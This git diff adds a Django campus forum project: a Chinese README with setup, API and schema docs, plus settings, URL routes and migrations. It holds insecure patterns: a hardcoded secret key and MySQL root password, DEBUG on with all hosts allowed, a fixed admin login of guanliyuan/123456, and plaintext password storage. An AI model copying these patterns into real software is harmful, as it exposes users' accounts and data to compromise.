diff --git a/README.md b/README.md new file mode 100644 index 0000000..0f6bd13 --- /dev/null +++ b/README.md @@ -0,0 +1,373 @@ +# ForumSystem +# 滑动师范大学论坛 +### 环境配置 + +一、更新系统软件包 +yum update -y +二、安装软件管理包和可能使用的依赖 +yum -y groupinstall "Development tools" +yum install openssl-devel bzip2-devel expat-devel gdbm-devel readline-devel sqlite-devel psmisc libffi-devel +三、下载Pyhton3到/usr/local 目录 +cd /usr/local +wget https://www.python.org/ftp/python/3.6.6/Python-3.6.6.tgz +解压 +tar -zxvf Python-3.6.6.tgz +进入 Python-3.6.6路径 +cd Python-3.6.6 +编译安装到指定路径 +./configure --prefix=/usr/local/python3 +安装python3 +make +make install +python3建立软连接:ln -s /usr/local/python3/bin/python3.6 /usr/bin/python3 +同样给pip3建立软链接:ln -s /usr/local/python3/bin/pip3.6 /usr/bin/pip3 +四、安装virtualenv +pip3 install virtualenv +建立软链接 +ln -s /usr/local/python3/bin/virtualenv /usr/bin/virtualenv +五、下载并安装MySQL +wget -i -c http://dev.mysql.com/get/mysql57-community-release-el7-10.noarch.rpm +yum -y install mysql57-community-release-el7-10.noarch.rpm +yum -y install mysql-community-server + MySQL数据库设置: systemctl start mysqld.service +grep "password" /var/log/mysqld.log +登录mysql:mysql -uroot -p +修改密码:ALTER USER 'root'@'localhost' IDENTIFIED BY 'new password'; +创建数据库create database forum,并使用use forum; +创建/www/wwwroot/目录,并将项目解压至该目录 +在master目录下创建虚拟环境virtualenv --python=/usr/bin/python3 master_venv +执行source ./master_venv/bin/activate +修改/master/ForumSystem下settings.py中数据库密码 +回到master目录,在虚拟环境下安装pip3 install django pip3 install pgsql +pip3 install uwsgi pip3 install -r requirements.txt +安装requirements.txt出错 +centos安装psycopg2时出错:Error: pg_config executable not found.解决方案 +yum install postgresql-devel* +使用 pip install psycopg2-binary 安装即可 +再执行pip3 install -r requirements.txt +六、配置uwsgi配置文件(master同目录下,已创建,可以修改端口) +[uwsgi] +master = true +processes = 1 +threads = 2 +chdir = /www/wwwroot/master +#wsgi-file= /www/wwwroot/master/ +wsgi-file = /www/wwwroot/master/ForumSystem/wsgi.py +http = 0.0.0.0:8080 +logto = /www/wwwroot/master/logs/error.log +chmod-socket = 660 +vacuum = true +master = true +max-requests = 1000 +static-map = /static=/www/wwwroot/master/static + +在master目录下运行,进行数据库迁移: + +python manage.py makemigrations +python manage.py migrate + +在master目录下启动uwsgi +uwsgi --ini uwsgi.ini +浏览器输入网址http://ip地址:8080/login 安装成功 + + + + +## 展示 +### 用户端 +登录 +![image](http://ww1.sinaimg.cn/large/006tNc79ly1g4z46rpj9cj31k10u0drs.jpg) +主页 +![](http://ww4.sinaimg.cn/large/006tNc79ly1g520s6ijl0j31kl0u0e81.jpg) +全部帖子 +![](http://ww2.sinaimg.cn/large/006tNc79ly1g520t8nsslj31k10u0qv5.jpg) +发帖 +![](http://ww1.sinaimg.cn/large/006tNc79ly1g520u2tfwfj31k90u0drc.jpg) + +### 管理员端 +帖子管理 +![image](http://ww1.sinaimg.cn/large/006tNc79ly1g4z43fiddwj31jm0u0gy1.jpg) +公告管理 +![image](http://ww2.sinaimg.cn/large/006tNc79ly1g4z43pup25j31k10u0136.jpg) +板块(分类)管理 +![image](http://ww3.sinaimg.cn/large/006tNc79ly1g4z44l23y8j31jv0u0131.jpg) + +## 功能 +### 用户端功能 +- 注册:用户在注册界面可以提交注册,暂不支持手机短信验证,直接注册。 +- 登录:已注册的用户可以通过正确的用户名和密码登录。 +- 欢迎:主页的导航栏会显示用户名并且欢迎。 +- 查看公告:查看管理员发出的公告。 +- 查看指南:显示在主页的指南。 +- 推荐帖子:每个帖子可以选择推荐在首页显示。 +- 查看类别:可以看到论坛里帖子所有的类别,点击可以查看对应下的帖子。 +- 查看全部帖子:按照时间顺序,查看所有帖子。 +- 帖子筛选:可以根据帖子分类、回复量、发布时间进行组合筛选。 +- 帖子搜索:根据输入关键字查询相关帖子。 +- 发帖:普通用户可以发帖。 +- 查看帖子详细:可以看到帖子的发布时间,作者,类别,标题,简介,详细内容,所有留言信息。 +- 留言:可以在帖子下面发表文字或者图片留言(评论),暂不支持回复评论。 + + +## 系统说明 + +### 数据库 +项目采用mysql进行存储,我使用的是mysql 8.0.16。表之间不采用任何外键关联,逻辑的管理都在控制层完成。每个表的id都由Django自动创建,也同时作为主键。 +#### 表与字段 +##### 用户表:User +字段名称 | 字段类型 | 字段说明 +---|---|--- +id | int | 编号,自增,主键 +uid | vchar(16) | 用户名,唯一 +password | vchar(16) | 密码 +create_time | Date | 创建日期 +##### 帖子表:Topic +字段名称 | 字段类型 | 字段说明 +---|---|--- +id | int | 编号,自增,主键 +t_uid | vchar(16) | 帖子作者 +t_kind | vchar(32) | 帖子类型 +create_time | Date | 帖子发布日期 +t_photo | vchar(128) | 帖子主页图,允许为空 +t_content | vchar(3000) | 帖子内容 +t_title | vchar(64) | 帖子标题 +t_introduce | vchar(256) | 帖子介绍 +recommend | boolean | 是否推荐到主页,默认false +##### 回复表:Reply +字段名称 | 字段类型 | 字段说明 +---|---|--- +id | int | 编号,自增,主键 +r_tid | vchar(16) | 回复的帖子 +r_uid | vchar(16) | 发表回复的人 +r_time | Date | 回复时间 +r_photo | vchar(128) | 回复图片,允许为空 +r_content | vchar(256) | 回复内容 +##### 分类表:Kind +字段名称 | 字段类型 | 字段说明 +---|---|--- +id | int | 编号,自增,主键 +k_name | vchar(16) | 分类名称 +##### 公告表:Announcement +字段名称 | 字段类型 | 字段说明 +---|---|--- +id | int | 编号,自增,主键 +a_title | vchar(64) | 公告名称 +a_content | vchar(3000) | 公告内容,允许为空 + +#### 数据库代码 +数据库代码在模型(models)层:参见/ForumSystem/app01/models.py + + + +### 用户端 +#### 用户端前端 +- 主页: + - 显示公告:模板和数据渲染生成 + - 显示指南:html固定内容 + - 显示导航栏 + - 登陆后显示:主页、发帖、看帖、欢迎、退出 + - 未登录显示:主页、发帖(点击会跳转到登录)、看帖、登录。 + - 显示推荐帖子:模板和数据渲染生成 + - 显示全部帖子按钮:页面固定 + - 底部栏:显示名称和导航栏 +- 登录&注册页面: + - 一个输入框:分为用户名和密码 + - 两个按钮(登录/注册) + - 通过ajax发送登录或者注册请求 +- 全部帖子页面: + - 论坛名称(左上角):固定显示 + - 搜索框:固定,form表单post提交 + - 导航栏:同上 + - 组合筛选栏 + - 分类筛选:模板和数据渲染得到所有分类显示 + - 回复数量筛选:固定 + - 发布时间筛选:固定 + - 显示全部帖子:模板和数据渲染获取 +- 帖子详情页面:模板和数据渲染获取 + - 论坛名称:同上 + - 导航栏:同上 + - 帖子主图 + - 帖子标题和详细内容 + - 帖子作者、发布时间、分类 + - 发表留言栏:form表单,post提交 + - 显示所有留言:模板和数据渲染获取 +- 公告详情页面: + - 公告标题 + - 公告内容 +- 发布帖子页面: + - 一个大form表单,包括帖子的标题、简介、内容、封面图、类别(下拉选择)。 +- 修改密码页面: + - 用户名框(只显示,不可改) + - 原密码框 + - 新密码框 + - 确认新密码框 + - 提交(成功后返回主页)、取消(返回主页)按钮 + +#### 用户端接口 +##### 主页 +- url:http://127.0.0.1:8000/home/ +- GET请求 + - 参数:无 + - 返回值:10个最新公告列表,所有推荐贴列表,渲染好的**页面**。 + +##### 所有帖子 +- url:http://127.0.0.1:8000/all-0-0-0 +- GET请求 + - url说明:后3个0指组合筛选不进行筛选 + - 参数:无,也可以说是all后面的3个数字(kid, reply_limit, time_limit) + - 返回值:根据3个参数选择后的**帖子列表** +- POST请求: + - 参数 + - keys:搜索关键字 + - 返回值:根据关键字搜索到的**帖子列表** + +##### 登录、注册 +- url:http://127.0.0.1:8000/login/ +- GET请求: + - 参数:无 + - 返回值:登录页面 +- POST请求: + - 参数: + - type:login 或者 register + - uid:用户名 + - pwd:密码 + - 返回值: + - msg:信息 + - status:状态,成功与否 + +##### 发布帖子 +- url:http://127.0.0.1:8000/publish/ +- GET请求: + - 参数:无 + - 返回值:发布帖子页面 +- POST请求: + - 参数: + - t_title:标题 + - t_introduce:介绍 + - t_content:内容 + - t_kind:类别 + - t_photo:主图 + - 返回值: + - 成功后重定向到单个帖子页面 + +##### 单个帖子 +- url:http://127.0.0.1:8000/single/1/ +- GET请求: + - url说明:1就是tid + - 参数:tid + - 返回值:帖子相关所有信息,渲染成单个帖子详情页面 +- POST请求:主要用于评论的发表和删除 + - 参数: + - type:类型,删除评论还是发表评论 + - r_content:评论内容 + - r_photo:评论图片 + - r_id:回复id,删除已有回复才用到 + - 返回值: + - msg:信息 + - status:状态,成功与否 + +##### 修改密码 +- url:http://127.0.0.1:8000/edit-pwd/ +- GET请求: + - 参数:无 + - 返回值:修改密码页面 +- POST请求: + - 参数: + - old_pwd:旧密码 + - new_pwd1:新密码 + - new_pwd2:确认新密码 + - 返回值: + - 成功后重定向到主页 + + +### 管理员端 +#### 管理员前端 +- 管理员登录: + - 一个输入框:分为用户名和密码 + - 两个按钮(登录/取消) + - 一个form表单,提交数据 +- 帖子管理: + - 导航栏:帖子管理、公告管理、分类管理 + - 欢迎头部 + - 帖子列表:序号、名称、简介、推荐、操作 + - 推荐操作:绑定ajax,刷新页面 + - 取消推荐操作:ajax,刷新 + - 查看操作:跳转帖子详情页面 + - 删除操作:ajax,同时刷新 +- 公告管理: + - 导航栏:帖子管理、公告管理、分类管理 + - 欢迎头部 + - 公告列表:序号、标题、操作 + - 查看操作:跳转公告详情页面 + - 删除操作:ajax,同时刷新 +- 分类(板块)管理: + - 导航栏:帖子管理、公告管理、分类管理 + - 欢迎头部 + - 分类列表:序号、分类名称、操作 + - 查看该分类下所有帖子操作:跳转到全部帖子下组合搜索出分类里的帖子 + - 删除操作:ajax,同时刷新 + + +#### 管理员接口 +##### 登录 +- url:http://127.0.0.1:8000/my-admin/ +- GET请求: + - 参数:无 + - 返回值:管理员登录页面 +- POST请求: + - 参数: + - admin_id:管理员用户名 + - admin_pwd:管理员密码 + - 返回值: + - 成功后重定向到帖子管理页面 + - 注意:管理员我没有做表去存放管理员账号密码,所以在程序里写死了管理员账号为guanliyuan,密码为123456 + +##### 帖子管理 +- url:http://127.0.0.1:8000/admin-home/ +- GET请求: + - 参数:无 + - 返回值:所有帖子信息,渲染后的帖子管理页面,需要验证管理员是否登录(使用session) +- POST请求: + - 参数: + - type:post请求类型(以下为type可用的值) + - zhiding:置顶(推荐) + - qzhiding:取消置顶 + - delete:删除 + - t_id:帖子id,根据帖子id进行type操作 + - 返回值: + - msg:信息 + - status:成功与否状态 + +##### 公告管理 +- url:http://127.0.0.1:8000/announcement/ +- GET请求: + - 参数:无 + - 返回值:所有公告信息,渲染后的公告管理页面,需要验证管理员是否登录(使用session) +- POST请求: + - 参数: + - type:post请求类型 + - create:创建公告 + - delete:删除公告 + - a_id:公告id,如果type=delete需要公告id + - a_title:公告标题,如果type=create,需要公告标题 + - a_content:公告内容,如果type=create,需要公告标题 + - 返回值: + - msg:信息 + - status:成功与否状态 + +##### 分类管理 +- url:http://127.0.0.1:8000/kind-manage/ +- GET请求: + - 参数:无 + - 返回值:所有分类信息,渲染后的类别管理页面,需要验证管理员是否登录(使用session) +- POST请求: + - 参数: + - type:post请求类型(删除or创建) + - create:创建类别 + - delete:删除类别 + - k_id:类别id,如果type=delete需要类别id + - k_name:类别名称,如果type=create,需要类别名称 + - 返回值: + - msg:信息 + - status:成功与否状态 + diff --git a/master/.DS_Store b/master/.DS_Store new file mode 100644 index 0000000..2c49336 Binary files /dev/null and b/master/.DS_Store differ diff --git a/master/.idea/.gitignore b/master/.idea/.gitignore new file mode 100644 index 0000000..73f69e0 --- /dev/null +++ b/master/.idea/.gitignore @@ -0,0 +1,8 @@ +# Default ignored files +/shelf/ +/workspace.xml +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml +# Editor-based HTTP Client requests +/httpRequests/ diff --git a/master/.idea/ForumSystem.iml b/master/.idea/ForumSystem.iml new file mode 100644 index 0000000..cdd1605 --- /dev/null +++ b/master/.idea/ForumSystem.iml @@ -0,0 +1,34 @@ + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/master/.idea/dataSources.xml b/master/.idea/dataSources.xml new file mode 100644 index 0000000..def27e8 --- /dev/null +++ b/master/.idea/dataSources.xml @@ -0,0 +1,19 @@ + + + + + mysql.8 + true + com.mysql.cj.jdbc.Driver + jdbc:mysql://localhost:3306/forum_system + + + + + + + + + + + \ No newline at end of file diff --git a/master/.idea/dictionaries/likunhong.xml b/master/.idea/dictionaries/likunhong.xml new file mode 100644 index 0000000..d38bbda --- /dev/null +++ b/master/.idea/dictionaries/likunhong.xml @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/master/.idea/inspectionProfiles/Project_Default.xml b/master/.idea/inspectionProfiles/Project_Default.xml new file mode 100644 index 0000000..4065dcc --- /dev/null +++ b/master/.idea/inspectionProfiles/Project_Default.xml @@ -0,0 +1,20 @@ + + + + \ No newline at end of file diff --git a/master/.idea/libraries/R_User_Library.xml b/master/.idea/libraries/R_User_Library.xml new file mode 100644 index 0000000..71f5ff7 --- /dev/null +++ b/master/.idea/libraries/R_User_Library.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/master/.idea/misc.xml b/master/.idea/misc.xml new file mode 100644 index 0000000..a9940b6 --- /dev/null +++ b/master/.idea/misc.xml @@ -0,0 +1,30 @@ + + + + + + + + + + + CSS + + + Probable bugsCSS + + + RELAX NG + + + + + Angular + + + + + + + \ No newline at end of file diff --git a/master/.idea/modules.xml b/master/.idea/modules.xml new file mode 100644 index 0000000..711b5b7 --- /dev/null +++ b/master/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/master/.idea/vcs.xml b/master/.idea/vcs.xml new file mode 100644 index 0000000..94a25f7 --- /dev/null +++ b/master/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/master/ForumSystem/__init__.py b/master/ForumSystem/__init__.py new file mode 100644 index 0000000..26576f4 --- /dev/null +++ b/master/ForumSystem/__init__.py @@ -0,0 +1,5 @@ +import pymysql + +pymysql.version_info = (1, 4, 13, "final", 0) + +pymysql.install_as_MySQLdb() \ No newline at end of file diff --git a/master/ForumSystem/__pycache__/__init__.cpython-36.pyc b/master/ForumSystem/__pycache__/__init__.cpython-36.pyc new file mode 100644 index 0000000..980e5a9 Binary files /dev/null and b/master/ForumSystem/__pycache__/__init__.cpython-36.pyc differ diff --git a/master/ForumSystem/__pycache__/__init__.cpython-37.pyc b/master/ForumSystem/__pycache__/__init__.cpython-37.pyc new file mode 100644 index 0000000..6d25b7e Binary files /dev/null and b/master/ForumSystem/__pycache__/__init__.cpython-37.pyc differ diff --git a/master/ForumSystem/__pycache__/settings.cpython-36.pyc b/master/ForumSystem/__pycache__/settings.cpython-36.pyc new file mode 100644 index 0000000..5d2e81a Binary files /dev/null and b/master/ForumSystem/__pycache__/settings.cpython-36.pyc differ diff --git a/master/ForumSystem/__pycache__/settings.cpython-37.pyc b/master/ForumSystem/__pycache__/settings.cpython-37.pyc new file mode 100644 index 0000000..bbfff2c Binary files /dev/null and b/master/ForumSystem/__pycache__/settings.cpython-37.pyc differ diff --git a/master/ForumSystem/__pycache__/urls.cpython-36.pyc b/master/ForumSystem/__pycache__/urls.cpython-36.pyc new file mode 100644 index 0000000..a5c9f89 Binary files /dev/null and b/master/ForumSystem/__pycache__/urls.cpython-36.pyc differ diff --git a/master/ForumSystem/__pycache__/urls.cpython-37.pyc b/master/ForumSystem/__pycache__/urls.cpython-37.pyc new file mode 100644 index 0000000..b34b71a Binary files /dev/null and b/master/ForumSystem/__pycache__/urls.cpython-37.pyc differ diff --git a/master/ForumSystem/__pycache__/wsgi.cpython-37.pyc b/master/ForumSystem/__pycache__/wsgi.cpython-37.pyc new file mode 100644 index 0000000..b7ab74b Binary files /dev/null and b/master/ForumSystem/__pycache__/wsgi.cpython-37.pyc differ diff --git a/master/ForumSystem/settings.py b/master/ForumSystem/settings.py new file mode 100644 index 0000000..c969bc8 --- /dev/null +++ b/master/ForumSystem/settings.py @@ -0,0 +1,145 @@ +""" +Django settings for ForumSystem project. + +Generated by 'django-admin startproject' using Django 2.1.4. + +For more information on this file, see +https://docs.djangoproject.com/en/2.1/topics/settings/ + +For the full list of settings and their values, see +https://docs.djangoproject.com/en/2.1/ref/settings/ +""" + +import os + +# Build paths inside the project like this: os.path.join(BASE_DIR, ...) +BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + + +# Quick-start development settings - unsuitable for production +# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/ + +# SECURITY WARNING: keep the secret key used in production secret! +SECRET_KEY = 'e(!)-kb_kqw5p@%u!6ak6u2$db5-4h@c#u)dwrcw^xp5m-q(q$' + +# SECURITY WARNING: don't run with debug turned on in production! +DEBUG = True + +ALLOWED_HOSTS = [ + '*' +] + + +# Application definition + +INSTALLED_APPS = [ + 'django.contrib.admin', + 'django.contrib.auth', + 'django.contrib.contenttypes', + 'django.contrib.sessions', + 'django.contrib.messages', + 'django.contrib.staticfiles', + 'app01.apps.App01Config', +] + +MIDDLEWARE = [ + 'django.middleware.security.SecurityMiddleware', + 'django.contrib.sessions.middleware.SessionMiddleware', + 'django.middleware.common.CommonMiddleware', + 'django.middleware.csrf.CsrfViewMiddleware', + 'django.contrib.auth.middleware.AuthenticationMiddleware', + 'django.contrib.messages.middleware.MessageMiddleware', + 'django.middleware.clickjacking.XFrameOptionsMiddleware', +] + +ROOT_URLCONF = 'ForumSystem.urls' + +TEMPLATES = [ + { + 'BACKEND': 'django.template.backends.django.DjangoTemplates', + 'DIRS': [os.path.join(BASE_DIR, 'templates')] + , + 'APP_DIRS': True, + 'OPTIONS': { + 'context_processors': [ + 'django.template.context_processors.debug', + 'django.template.context_processors.request', + 'django.contrib.auth.context_processors.auth', + 'django.contrib.messages.context_processors.messages', + ], + }, + }, +] + +WSGI_APPLICATION = 'ForumSystem.wsgi.application' + + +# Database +# https://docs.djangoproject.com/en/2.1/ref/settings/#databases + +# DATABASES = { +# 'default': { +# 'ENGINE': 'django.db.backends.sqlite3', +# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), +# } +# } +DATABASES = { + 'default': { + 'ENGINE': 'django.db.backends.mysql', + 'HOST': '', + 'NAME': 'forum', #你的数据库名称 + 'USER': 'root', #你的数据库用户名 + 'PASSWORD': 'xsh_123_XSH', + 'PORT': '3306', + } +} + + +# Password validation +# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators + +AUTH_PASSWORD_VALIDATORS = [ + { + 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', + }, + { + 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', + }, + { + 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', + }, + { + 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', + }, +] + + +# Internationalization +# https://docs.djangoproject.com/en/2.1/topics/i18n/ + +# LANGUAGE_CODE = 'en-us' + +# TIME_ZONE = 'UTC' + +LANGUAGE_CODE = 'zh-hans' + +TIME_ZONE = 'Asia/Shanghai' + +USE_I18N = True + +USE_L10N = True + +USE_TZ = True + + +# Static files (CSS, JavaScript, Images) +# https://docs.djangoproject.com/en/2.1/howto/static-files/ + +STATIC_URL = '/static/' +# STATIC_ROOT = os.path.join(BASE_DIR,'static') +# STATIC_URL = '/static/' +STATIC_ROOT = os.path.join(BASE_DIR, "static") + +STATICFILES_DIRS = ( + os.path.join(BASE_DIR, 'static'), +) diff --git a/master/ForumSystem/urls.py b/master/ForumSystem/urls.py new file mode 100644 index 0000000..aa7a2d5 --- /dev/null +++ b/master/ForumSystem/urls.py @@ -0,0 +1,36 @@ +"""ForumSystem URL Configuration + +The `urlpatterns` list routes URLs to views. For more information please see: + https://docs.djangoproject.com/en/2.1/topics/http/urls/ +Examples: +Function views + 1. Add an import: from my_app import views + 2. Add a URL to urlpatterns: path('', views.home, name='home') +Class-based views + 1. Add an import: from other_app.views import Home + 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') +Including another URLconf + 1. Import the include() function: from django.urls import include, path + 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) +""" +from django.contrib import admin +from django.urls import path +from app01 import views +from django.conf.urls import url + +urlpatterns = [ + path('admin/', admin.site.urls), + # url(r'^all/', views.all_tie), # 全部帖子 + url(r'^ownpublish-(?P\d+)-(?P\d+)-(?P\d+)', views.ownpublish), # 按条件搜索自己帖子 + url(r'^all-(?P\d+)-(?P\d+)-(?P\d+)', views.all_tie), # 按条件搜索帖子 + url(r'^home/', views.home), # 主页 + url(r'^login/', views.login), # 登录注册 + url(r'^publish/', views.publish), # 发布帖子 + url(r'^single/(?P\d+)/', views.single), # 单个帖子 + url(r'^edit-pwd/', views.edit_pwd), # 修改密码 + url(r'^my-admin/', views.admin), # 修改密码 + url(r'^announcement/', views.announcement), # 公告管理 + url(r'^admin-home/', views.topic_manage), # 帖子管理,也是主页面 + url(r'^kind-manage/', views.kind_manage), # 板块管理 + url(r'^single-an-(?P\d+)/', views.single_an), # 单个公告显示 +] diff --git a/master/ForumSystem/wsgi.py b/master/ForumSystem/wsgi.py new file mode 100644 index 0000000..8682e10 --- /dev/null +++ b/master/ForumSystem/wsgi.py @@ -0,0 +1,15 @@ +""" +WSGI config for ForumSystem project. + +It exposes the WSGI callable as a module-level variable named ``application``. + +For more information on this file, see +https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/ +""" + +import os + +from django.core.wsgi import get_wsgi_application + +os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ForumSystem.settings') +application = get_wsgi_application() diff --git a/master/__pycache__/manage.cpython-37.pyc b/master/__pycache__/manage.cpython-37.pyc new file mode 100644 index 0000000..a29d2f5 Binary files /dev/null and b/master/__pycache__/manage.cpython-37.pyc differ diff --git a/master/app01/__init__.py b/master/app01/__init__.py new file mode 100644 index 0000000..26576f4 --- /dev/null +++ b/master/app01/__init__.py @@ -0,0 +1,5 @@ +import pymysql + +pymysql.version_info = (1, 4, 13, "final", 0) + +pymysql.install_as_MySQLdb() \ No newline at end of file diff --git a/master/app01/__pycache__/__init__.cpython-36.pyc b/master/app01/__pycache__/__init__.cpython-36.pyc new file mode 100644 index 0000000..d898127 Binary files /dev/null and b/master/app01/__pycache__/__init__.cpython-36.pyc differ diff --git a/master/app01/__pycache__/__init__.cpython-37.pyc b/master/app01/__pycache__/__init__.cpython-37.pyc new file mode 100644 index 0000000..609115a Binary files /dev/null and b/master/app01/__pycache__/__init__.cpython-37.pyc differ diff --git a/master/app01/__pycache__/admin.cpython-36.pyc b/master/app01/__pycache__/admin.cpython-36.pyc new file mode 100644 index 0000000..a010739 Binary files /dev/null and b/master/app01/__pycache__/admin.cpython-36.pyc differ diff --git a/master/app01/__pycache__/admin.cpython-37.pyc b/master/app01/__pycache__/admin.cpython-37.pyc new file mode 100644 index 0000000..6c5e63b Binary files /dev/null and b/master/app01/__pycache__/admin.cpython-37.pyc differ diff --git a/master/app01/__pycache__/apps.cpython-36.pyc b/master/app01/__pycache__/apps.cpython-36.pyc new file mode 100644 index 0000000..2d517da Binary files /dev/null and b/master/app01/__pycache__/apps.cpython-36.pyc differ diff --git a/master/app01/__pycache__/apps.cpython-37.pyc b/master/app01/__pycache__/apps.cpython-37.pyc new file mode 100644 index 0000000..5a7bfae Binary files /dev/null and b/master/app01/__pycache__/apps.cpython-37.pyc differ diff --git a/master/app01/__pycache__/models.cpython-36.pyc b/master/app01/__pycache__/models.cpython-36.pyc new file mode 100644 index 0000000..27a6e62 Binary files /dev/null and b/master/app01/__pycache__/models.cpython-36.pyc differ diff --git a/master/app01/__pycache__/models.cpython-37.pyc b/master/app01/__pycache__/models.cpython-37.pyc new file mode 100644 index 0000000..bcfc46b Binary files /dev/null and b/master/app01/__pycache__/models.cpython-37.pyc differ diff --git a/master/app01/__pycache__/views.cpython-36.pyc b/master/app01/__pycache__/views.cpython-36.pyc new file mode 100644 index 0000000..1aa248c Binary files /dev/null and b/master/app01/__pycache__/views.cpython-36.pyc differ diff --git a/master/app01/__pycache__/views.cpython-37.pyc b/master/app01/__pycache__/views.cpython-37.pyc new file mode 100644 index 0000000..4ac0586 Binary files /dev/null and b/master/app01/__pycache__/views.cpython-37.pyc differ diff --git a/master/app01/admin.py b/master/app01/admin.py new file mode 100644 index 0000000..8c38f3f --- /dev/null +++ b/master/app01/admin.py @@ -0,0 +1,3 @@ +from django.contrib import admin + +# Register your models here. diff --git a/master/app01/apps.py b/master/app01/apps.py new file mode 100644 index 0000000..84e8b6f --- /dev/null +++ b/master/app01/apps.py @@ -0,0 +1,5 @@ +from django.apps import AppConfig + + +class App01Config(AppConfig): + name = 'app01' diff --git a/master/app01/migrations/0001_initial.py b/master/app01/migrations/0001_initial.py new file mode 100644 index 0000000..5592de0 --- /dev/null +++ b/master/app01/migrations/0001_initial.py @@ -0,0 +1,65 @@ +# Generated by Django 2.1.4 on 2019-07-02 04:07 + +from django.db import migrations, models + + +class Migration(migrations.Migration): + + initial = True + + dependencies = [ + ] + + operations = [ + migrations.CreateModel( + name='Announcement', + fields=[ + ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), + ('a_id', models.CharField(max_length=16, verbose_name='公告id')), + ('a_title', models.CharField(max_length=16, verbose_name='公告标题')), + ('a_content', models.CharField(max_length=16, null=True, verbose_name='公告内容')), + ], + ), + migrations.CreateModel( + name='Kind', + fields=[ + ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), + ('k_id', models.CharField(max_length=16, verbose_name='分类id')), + ('k_name', models.CharField(max_length=16, verbose_name='分类名称')), + ], + ), + migrations.CreateModel( + name='Reply', + fields=[ + ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), + ('r_tid', models.CharField(max_length=16, verbose_name='帖子id')), + ('r_uid', models.CharField(max_length=16, verbose_name='发表者id')), + ('r_photo', models.CharField(max_length=128, null=True, verbose_name='回复的图片')), + ('r_time', models.DateField(auto_now_add=True, verbose_name='留言时间')), + ('r_content', models.CharField(max_length=256, verbose_name='回复内容')), + ], + ), + migrations.CreateModel( + name='Topic', + fields=[ + ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), + ('t_id', models.CharField(max_length=16, verbose_name='帖子id')), + ('t_uid', models.CharField(max_length=16, verbose_name='帖子所属用户id')), + ('t_kind', models.CharField(max_length=32, verbose_name='类别')), + ('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')), + ('t_photo', models.CharField(max_length=128, null=True, verbose_name='帖子图片')), + ('t_content', models.CharField(max_length=3000, verbose_name='帖子正文')), + ('t_title', models.CharField(max_length=64, verbose_name='帖子标题')), + ('t_introduce', models.CharField(max_length=256, verbose_name='帖子简介')), + ], + ), + migrations.CreateModel( + name='User', + fields=[ + ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), + ('uid', models.CharField(max_length=16, unique=True, verbose_name='电话/用户号')), + ('password', models.CharField(max_length=16, verbose_name='密码')), + ('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')), + ], + ), + ] diff --git a/master/app01/migrations/0002_auto_20190703_0151.py b/master/app01/migrations/0002_auto_20190703_0151.py new file mode 100644 index 0000000..0693a83 --- /dev/null +++ b/master/app01/migrations/0002_auto_20190703_0151.py @@ -0,0 +1,28 @@ +# Generated by Django 2.1.4 on 2019-07-03 01:51 + +from django.db import migrations, models + + +class Migration(migrations.Migration): + + dependencies = [ + ('app01', '0001_initial'), + ] + + operations = [ + migrations.AddField( + model_name='topic', + name='recommend', + field=models.BooleanField(default=False, verbose_name='是否推荐'), + ), + migrations.AlterField( + model_name='announcement', + name='a_content', + field=models.CharField(max_length=3000, null=True, verbose_name='公告内容'), + ), + migrations.AlterField( + model_name='announcement', + name='a_title', + field=models.CharField(max_length=64, verbose_name='公告标题'), + ), + ] diff --git a/master/app01/migrations/0003_auto_20190703_0259.py b/master/app01/migrations/0003_auto_20190703_0259.py new file mode 100644 index 0000000..9b92948 --- /dev/null +++ b/master/app01/migrations/0003_auto_20190703_0259.py @@ -0,0 +1,25 @@ +# Generated by Django 2.1.4 on 2019-07-03 02:59 + +from django.db import migrations + + +class Migration(migrations.Migration): + + dependencies = [ + ('app01', '0002_auto_20190703_0151'), + ] + + operations = [ + migrations.RemoveField( + model_name='announcement', + name='a_id', + ), + migrations.RemoveField( + model_name='kind', + name='k_id', + ), + migrations.RemoveField( + model_name='topic', + name='t_id', + ), + ] diff --git a/master/app01/migrations/0004_topic_t_like.py b/master/app01/migrations/0004_topic_t_like.py new file mode 100644 index 0000000..e30aea0 --- /dev/null +++ b/master/app01/migrations/0004_topic_t_like.py @@ -0,0 +1,18 @@ +# Generated by Django 3.1.5 on 2021-01-13 09:16 + +from django.db import migrations, models + + +class Migration(migrations.Migration): + + dependencies = [ + ('app01', '0003_auto_20190703_0259'), + ] + + operations = [ + migrations.AddField( + model_name='topic', + name='t_like', + field=models.IntegerField(default=0, verbose_name='点赞数量'), + ), + ] diff --git a/master/app01/migrations/__init__.py b/master/app01/migrations/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/master/app01/migrations/__pycache__/0001_initial.cpython-36.pyc b/master/app01/migrations/__pycache__/0001_initial.cpython-36.pyc new file mode 100644 index 0000000..9e59d84 Binary files /dev/null and b/master/app01/migrations/__pycache__/0001_initial.cpython-36.pyc differ diff --git a/master/app01/migrations/__pycache__/0001_initial.cpython-37.pyc b/master/app01/migrations/__pycache__/0001_initial.cpython-37.pyc new file mode 100644 index 0000000..e2d4fbe Binary files /dev/null and 